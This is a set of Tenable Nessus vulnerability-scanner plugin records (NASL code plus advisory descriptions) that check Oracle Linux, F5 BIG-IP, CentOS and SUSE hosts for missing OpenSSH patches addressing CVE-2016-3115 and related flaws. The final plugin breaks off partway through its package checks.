description: From Red Hat Security Advisory 2016:0465 : Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) An access flaw was discovered in OpenSSH; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908) All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 90074
published: 2016-03-22
reporter: This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/90074
title: Oracle Linux 7 : openssh (ELSA-2016-0465)
code:

```nasl
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2016:0465 and
# Oracle Linux Security Advisory ELSA-2016-0465 respectively.
#

include("compat.inc");

if (description)
{
  script_id(90074);
  script_version("2.11");
  script_cvs_date("Date: 2019/09/27 13:00:37");

  script_cve_id("CVE-2016-1908", "CVE-2016-3115");
  script_xref(name:"RHSA", value:"2016:0465");

  script_name(english:"Oracle Linux 7 : openssh (ELSA-2016-0465)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Oracle Linux host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"From Red Hat Security Advisory 2016:0465 :

Updated openssh packages that fix two security issues are now available
for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having Moderate
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.

OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These
packages include the core files necessary for both the OpenSSH client
and server.

It was discovered that the OpenSSH server did not sanitize data received
in requests to enable X11 forwarding. An authenticated client with
restricted SSH access could possibly use this flaw to bypass intended
restrictions. (CVE-2016-3115)

An access flaw was discovered in OpenSSH; the OpenSSH client did not
correctly handle failures to generate authentication cookies for
untrusted X11 forwarding. A malicious or compromised remote X
application could possibly use this flaw to establish a trusted
connection to the local X server, even if only untrusted X11 forwarding
was requested. (CVE-2016-1908)

All openssh users are advised to upgrade to these updated packages,
which contain backported patches to correct these issues. After
installing this update, the OpenSSH server daemon (sshd) will be
restarted automatically."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://oss.oracle.com/pipermail/el-errata/2016-March/005876.html"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected openssh packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-askpass");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-clients");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-keycat");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-ldap");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-server");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-server-sysvinit");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:pam_ssh_agent_auth");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:7");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Oracle Linux Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux");
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || !pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux");
os_ver = pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux");
os_ver = os_ver[1];
if (! preg(pattern:"^7([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 7", "Oracle Linux " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu);
if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu);

flag = 0;
if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-6.6.1p1-25.el7_2")) flag++;
if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-askpass-6.6.1p1-25.el7_2")) flag++;
if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-clients-6.6.1p1-25.el7_2")) flag++;
if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-keycat-6.6.1p1-25.el7_2")) flag++;
if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-ldap-6.6.1p1-25.el7_2")) flag++;
if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-server-6.6.1p1-25.el7_2")) flag++;
if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-server-sysvinit-6.6.1p1-25.el7_2")) flag++;
if (rpm_check(release:"EL7", cpu:"x86_64", reference:"pam_ssh_agent_auth-0.9.3-9.25.el7_2")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-keycat / etc");
}
```
NASL family: F5 Networks Local Security Checks
NASL id: F5_BIGIP_SOL93532943.NASL
description: Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH before 7.2p2 allow remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions. (CVE-2016-3115)
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 101859
published: 2017-07-21
reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/101859
title: F5 Networks BIG-IP : SSHD session.c vulnerability (K93532943)
code:

```nasl
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from F5 Networks BIG-IP Solution K93532943.
#
# The text description of this plugin is (C) F5 Networks.
#

include("compat.inc");

if (description)
{
  script_id(101859);
  script_version("3.5");
  script_cvs_date("Date: 2019/01/04 10:03:40");

  script_cve_id("CVE-2016-3115");

  script_name(english:"F5 Networks BIG-IP : SSHD session.c vulnerability (K93532943)");
  script_summary(english:"Checks the BIG-IP version.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote device is missing a vendor-supplied security patch."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH
before 7.2p2 allow remote authenticated users to bypass intended
shell-command restrictions via crafted X11 forwarding data, related to
the (1) do_authenticated1 and (2) session_x11_req functions.
(CVE-2016-3115)"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://support.f5.com/csp/article/K93532943"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"Upgrade to one of the non-vulnerable versions listed in the F5 Solution
K93532943."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"potential_vulnerability", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_access_policy_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_advanced_firewall_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_acceleration_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_security_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_visibility_and_reporting");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_global_traffic_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_link_controller");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_local_traffic_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_policy_enforcement_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_wan_optimization_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_webaccelerator");
  script_set_attribute(attribute:"cpe", value:"cpe:/h:f5:big-ip");
  script_set_attribute(attribute:"cpe", value:"cpe:/h:f5:big-ip_protocol_security_manager");

  script_set_attribute(attribute:"patch_publication_date", value:"2016/04/27");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/21");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"F5 Networks Local Security Checks");

  script_dependencies("f5_bigip_detect.nbin");
  script_require_keys("Host/local_checks_enabled", "Host/BIG-IP/hotfix", "Host/BIG-IP/modules", "Host/BIG-IP/version", "Settings/ParanoidReport");

  exit(0);
}

include("f5_func.inc");

if ( ! get_kb_item("Host/local_checks_enabled") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
version = get_kb_item("Host/BIG-IP/version");
if ( ! version ) audit(AUDIT_OS_NOT, "F5 Networks BIG-IP");
if ( isnull(get_kb_item("Host/BIG-IP/hotfix")) ) audit(AUDIT_KB_MISSING, "Host/BIG-IP/hotfix");
if ( ! get_kb_item("Host/BIG-IP/modules") ) audit(AUDIT_KB_MISSING, "Host/BIG-IP/modules");

sol = "K93532943";
vmatrix = make_array();

if (report_paranoia < 2) audit(AUDIT_PARANOID);

# AFM
vmatrix["AFM"] = make_array();
vmatrix["AFM"]["affected"  ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3");
vmatrix["AFM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3");

# AM
vmatrix["AM"] = make_array();
vmatrix["AM"]["affected"  ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3");
vmatrix["AM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3");

# APM
vmatrix["APM"] = make_array();
vmatrix["APM"]["affected"  ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3","11.2.1","10.2.1-10.2.4");
vmatrix["APM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3");

# ASM
vmatrix["ASM"] = make_array();
vmatrix["ASM"]["affected"  ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3","11.2.1","10.2.1-10.2.4");
vmatrix["ASM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3");

# AVR
vmatrix["AVR"] = make_array();
vmatrix["AVR"]["affected"  ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3");
vmatrix["AVR"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3");

# LC
vmatrix["LC"] = make_array();
vmatrix["LC"]["affected"  ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3","11.2.1","10.2.1-10.2.4");
vmatrix["LC"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3");

# LTM
vmatrix["LTM"] = make_array();
vmatrix["LTM"]["affected"  ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3","11.2.1","10.2.1-10.2.4");
vmatrix["LTM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3");

# PEM
vmatrix["PEM"] = make_array();
vmatrix["PEM"]["affected"  ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3");
vmatrix["PEM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3");

if (bigip_is_affected(vmatrix:vmatrix, sol:sol))
{
  if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());
  else security_warning(0);
  exit(0);
}
else
{
  tested = bigip_get_tested_modules();
  audit_extra = "For BIG-IP module(s) " + tested + ",";
  if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);
  else audit(AUDIT_HOST_NOT, "running any of the affected modules");
}
```
NASL family: CentOS Local Security Checks
NASL id: CENTOS_RHSA-2016-0466.NASL
description: Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 90069
published: 2016-03-22
reporter: This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/90069
title: CentOS 6 : openssh (CESA-2016:0466)
code:

#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2016:0466 and
# CentOS Errata and Security Advisory 2016:0466 respectively.
#

include("compat.inc");

if (description)
{
  script_id(90069);
  script_version("2.8");
  script_cvs_date("Date: 2020/01/02");

  script_cve_id("CVE-2015-5600", "CVE-2016-3115");
  script_xref(name:"RHSA", value:"2016:0466");

  script_name(english:"CentOS 6 : openssh (CESA-2016:0466)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote CentOS host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Updated openssh packages that fix two security issues are now available
for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having Moderate
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.

OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These
packages include the core files necessary for both the OpenSSH client
and server.

It was discovered that the OpenSSH server did not sanitize data received
in requests to enable X11 forwarding. An authenticated client with
restricted SSH access could possibly use this flaw to bypass intended
restrictions. (CVE-2016-3115)

It was discovered that the OpenSSH sshd daemon did not check the list of
keyboard-interactive authentication methods for duplicates. A remote
attacker could use this flaw to bypass the MaxAuthTries limit, making it
easier to perform password guessing attacks. (CVE-2015-5600)

All openssh users are advised to upgrade to these updated packages,
which contain backported patches to correct these issues. After
installing this update, the OpenSSH server daemon (sshd) will be
restarted automatically."
  );
  # https://lists.centos.org/pipermail/centos-announce/2016-March/021745.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?e1e33f57"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected openssh packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-5600");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh-askpass");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh-clients");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh-ldap");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh-server");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:pam_ssh_agent_auth");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:centos:centos:6");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/08/03");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"CentOS Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/CentOS/release", "Host/CentOS/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

release = get_kb_item("Host/CentOS/release");
if (isnull(release) || "CentOS" >!< release) audit(AUDIT_OS_NOT, "CentOS");
os_ver = pregmatch(pattern: "CentOS(?: Linux)? release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "CentOS");
os_ver = os_ver[1];
if (! preg(pattern:"^6([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "CentOS 6.x", "CentOS " + os_ver);

if (!get_kb_item("Host/CentOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "CentOS", cpu);

flag = 0;
if (rpm_check(release:"CentOS-6", reference:"openssh-5.3p1-114.el6_7")) flag++;
if (rpm_check(release:"CentOS-6", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++;
if (rpm_check(release:"CentOS-6", reference:"openssh-clients-5.3p1-114.el6_7")) flag++;
if (rpm_check(release:"CentOS-6", reference:"openssh-ldap-5.3p1-114.el6_7")) flag++;
if (rpm_check(release:"CentOS-6", reference:"openssh-server-5.3p1-114.el6_7")) flag++;
if (rpm_check(release:"CentOS-6", reference:"pam_ssh_agent_auth-0.9.3-114.el6_7")) flag++;

if (flag)
{
  security_report_v4(
    port       : 0,
    severity   : SECURITY_HOLE,
    extra      : rpm_report_get()
  );
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-ldap / etc");
}
NASL family: SuSE Local Security Checks
NASL id: SUSE_SU-2016-1386-1.NASL
description: This update for OpenSSH fixes three security issues. These security issues were fixed : - CVE-2016-3115: Sanitise input for xauth(1) (bsc#970632) - CVE-2016-1908: Prevent X11 SECURITY circumvention when forwarding X11 connections (bsc#962313) - CVE-2015-8325: Ignore PAM environment when using login (bsc#975865) The update package also includes non-security fixes. See advisory for details. Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 91318
published: 2016-05-25
reporter: This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/91318
title: SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2016:1386-1)
code:

#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from SUSE update advisory SUSE-SU-2016:1386-1.
# The text itself is copyright (C) SUSE.
#

include("compat.inc");

if (description)
{
  script_id(91318);
  script_version("2.11");
  script_cvs_date("Date: 2019/09/11 11:22:13");

  script_cve_id("CVE-2015-8325", "CVE-2016-1908", "CVE-2016-3115");

  script_name(english:"SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2016:1386-1)");
  script_summary(english:"Checks rpm output for the updated packages.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote SUSE host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"This update for OpenSSH fixes three security issues.

These security issues were fixed :

  - CVE-2016-3115: Sanitise input for xauth(1) (bsc#970632)

  - CVE-2016-1908: Prevent X11 SECURITY circumvention when
    forwarding X11 connections (bsc#962313)

  - CVE-2015-8325: Ignore PAM environment when using login
    (bsc#975865)

The update package also includes non-security fixes. See advisory for
details.

Note that Tenable Network Security has extracted the preceding
description block directly from the SUSE security advisory. Tenable has
attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=729190"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=932483"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=945484"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=945493"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=947458"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=948902"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=960414"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=961368"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=962313"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=965576"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=970632"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=975865"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2015-8325/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-1908/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-3115/"
  );
  # https://www.suse.com/support/update/announcement/2016/suse-su-20161386-1/
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?dc6c7c3f"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"To install this SUSE Security Update use YaST online_update.
Alternatively you can run the command listed for your product :

SUSE Linux Enterprise Server 12-SP1 :

zypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-818=1

SUSE Linux Enterprise Server 12 :

zypper in -t patch SUSE-SLE-SERVER-12-2016-818=1

SUSE Linux Enterprise Desktop 12-SP1 :

zypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-818=1

SUSE Linux Enterprise Desktop 12 :

zypper in -t patch SUSE-SLE-DESKTOP-12-2016-818=1

To bring your system up-to-date, use 'zypper patch'."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-debugsource");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-fips");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-helpers");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:12");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/05/23");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/05/25");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release !~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "SUSE");
os_ver = pregmatch(pattern: "^(SLE(S|D)\d+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE");
os_ver = os_ver[1];
if (! preg(pattern:"^(SLED12|SLES12)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLED12 / SLES12", "SUSE " + os_ver);

if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu);

sp = get_kb_item("Host/SuSE/patchlevel");
if (isnull(sp)) sp = "0";
if (os_ver == "SLES12" && (! preg(pattern:"^(0|1)$", string:sp))) audit(AUDIT_OS_NOT, "SLES12 SP0/1", os_ver + " SP" + sp);
if (os_ver == "SLED12" && (! preg(pattern:"^(0|1)$", string:sp))) audit(AUDIT_OS_NOT, "SLED12 SP0/1", os_ver + " SP" + sp);

flag = 0;
if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-askpass-gnome-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-askpass-gnome-debuginfo-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-debuginfo-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-debugsource-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-fips-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-helpers-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-helpers-debuginfo-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-6.6p1-42.1")) flag++;
